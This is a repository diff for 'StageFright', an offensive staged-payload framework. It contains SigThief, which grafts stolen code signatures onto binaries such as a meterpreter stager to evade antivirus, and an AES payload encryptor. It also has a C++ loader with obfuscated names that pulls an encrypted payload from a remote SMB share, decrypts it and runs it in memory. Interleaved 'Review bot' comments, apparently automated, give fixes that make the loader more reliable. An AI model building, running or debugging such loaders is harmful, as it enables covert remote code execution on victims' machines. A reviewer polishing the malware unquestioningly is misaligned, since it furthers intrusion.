+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

BIN
StageFright/StageFright/SharedTCP.exe


+ 76 - 0
StageFright/StageFright/StageFright.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+                **by assume-breach**
+
+             A staged payload framework." 
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create Staged EXE"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create Staged DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash EXE.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash DLL.sh
+
+else
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
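Review bot: The menu test `if [ $CHOICE == 1 ]` leaves `$CHOICE` unquoted, so pressing Enter on an empty line (or typing anything with a space) makes `[` abort with a syntax error instead of reaching the "Invalid option" branch; use `if [[ "$CHOICE" == 1 ]]; then` / `elif [[ "$CHOICE" == 2 ]]; then` and read the input with `read -r CHOICE`. `bash EXE.sh` and `bash DLL.sh` are resolved against the caller's working directory rather than the script's location, so running the launcher from anywhere else fails silently with the errors hidden by the preceding `clear`; `cd "$(dirname "$0")" || exit 1` near the top fixes that for both sub-scripts. In the `else` branch `trap easyexit EXIT` is only registered after the `sleep 3`, at which point the script is about to exit anyway, so a direct `easyexit` call reads more clearly. `WHITE="\e[0;17m"` is not a defined SGR code, though it is unused here.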

BIN
StageFright/StageFright/StageFright/Resources/OfficeSetup.exe


+ 29 - 0
StageFright/StageFright/StageFright/Resources/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+ 93 - 0
StageFright/StageFright/StageFright/Resources/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

+ 269 - 0
StageFright/StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

+ 26 - 0
StageFright/StageFright/StageFright/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 26 - 0
StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Plik diff jest za duży
+ 0 - 0
StageFright/StageFright/StageFright/SMB/Resources/con.py


+ 252 - 0
StageFright/StageFright/StageFright/SMB/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL KcylyuBhvyVr(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL RpJFyaApw(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int ldIxQwjSeJ(char* Random4, unsigned int AATpD, char* oGlDwGz, size_t oGlDwGzlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)oGlDwGz, (DWORD)oGlDwGzlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &AATpD)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char HnkJIiAnwFwX[] =  { 0x17, 0xe6, 0x41, 0xce, 0x83, 0xae, 0xde, 0xb0, 0xe4, 0x6e, 0xa8, 0xd3, 0xe7, 0x25, 0xf, 0x3f };
+
+int main() {
+    LPCWSTR szServer = L"win11blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ogaJQctJxnqlX;
+    SIZE_T ogaJQctJxnqlXSize;
+
+    BOOL success = KcylyuBhvyVr(szServer, szFilePath, &ogaJQctJxnqlX, &ogaJQctJxnqlXSize);
+
+    if (success) {
+        ldIxQwjSeJ((char*)ogaJQctJxnqlX, ogaJQctJxnqlXSize, HnkJIiAnwFwX, sizeof(HnkJIiAnwFwX));
+
+        success = RpJFyaApw(ogaJQctJxnqlX, ogaJQctJxnqlXSize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ogaJQctJxnqlXSize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ogaJQctJxnqlX,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ogaJQctJxnqlX);
+    }
+
+    return success ? 0 : 1;
+}
+
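Review bot: `LocalFree(ogaJQctJxnqlX)` in `main` is applied to a buffer that came from `NtAllocateVirtualMemory` and was already released by the `NtFreeVirtualMemory` call immediately above it, so it is both the wrong deallocator and a use of a freed pointer; delete that line. The return value of `ldIxQwjSeJ` is discarded, so when `CryptAcquireContextW` or `CryptDecrypt` fails the still-encrypted bytes are handed to `RpJFyaApw` and executed as code — guard it with `if (ldIxQwjSeJ(...) != 0) { success = FALSE; } else { success = RpJFyaApw(...); }`, and note that the early `return -1` paths in `ldIxQwjSeJ` leak `hProv`/`hHash`. In `KcylyuBhvyVr`, when `ReadFile` fails `bytesRead` is left uninitialized yet is still stored into `*binarySize`, and the `NtAllocateVirtualMemory` region is never freed on that path; initialize `DWORD bytesRead = 0;` and only publish the pointer on success. This copy under `Resources/` appears to be the sed-substituted output of the generator script (a literal hostname, share path and 16-byte key are baked into `main` and `HnkJIiAnwFwX`), i.e. a build artifact rather than source, and probably should not be committed.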

